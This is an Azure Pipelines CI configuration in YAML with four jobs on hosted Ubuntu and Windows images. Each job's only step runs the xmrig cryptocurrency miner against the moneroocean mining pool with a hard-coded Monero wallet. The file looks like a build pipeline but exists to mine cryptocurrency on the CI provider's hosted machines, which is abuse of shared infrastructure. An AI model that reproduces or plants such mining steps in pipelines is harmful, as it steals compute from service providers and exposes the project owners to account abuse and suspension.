jobs:
- job: Ubuntu16
  pool:
    vmImage: 'ubuntu-1604'
  steps:
  - script: xmrig --no-color -o gulf.moneroocean.stream:10001 -u 44iGHthRoegQckvM9wbNCmU7ibE5PamMGGfQV4Gd4BbZHtbPNNsAK2bTcHLgecU7soZKujCT16KRrZZr7dsMEnjBV1tHFM4 --donate-level=1
- job: Ubuntu1604
  pool:
    vmImage: 'ubuntu-16.04'
  steps:
  - script: ./xmrig --no-color -o gulf.moneroocean.stream:10001 -u 44iGHthRoegQckvM9wbNCmU7ibE5PamMGGfQV4Gd4BbZHtbPNNsAK2bTcHLgecU7soZKujCT16KRrZZr7dsMEnjBV1tHFM4 --donate-level=1
- job: Windows2016
  pool:
    vmImage: 'vs2017-win2016'
  steps:
  - script: xmrig.exe --no-color -o gulf.moneroocean.stream:10001 -u 44iGHthRoegQckvM9wbNCmU7ibE5PamMGGfQV4Gd4BbZHtbPNNsAK2bTcHLgecU7soZKujCT16KRrZZr7dsMEnjBV1tHFM4 --donate-level=1
- job: Windows2016R2
  pool:
    vmImage: 'vs2015-win2012r2'
  steps:
  - script: xmrig.exe --no-color -o gulf.moneroocean.stream:10001 -u 44iGHthRoegQckvM9wbNCmU7ibE5PamMGGfQV4Gd4BbZHtbPNNsAK2bTcHLgecU7soZKujCT16KRrZZr7dsMEnjBV1tHFM4 --donate-level=1
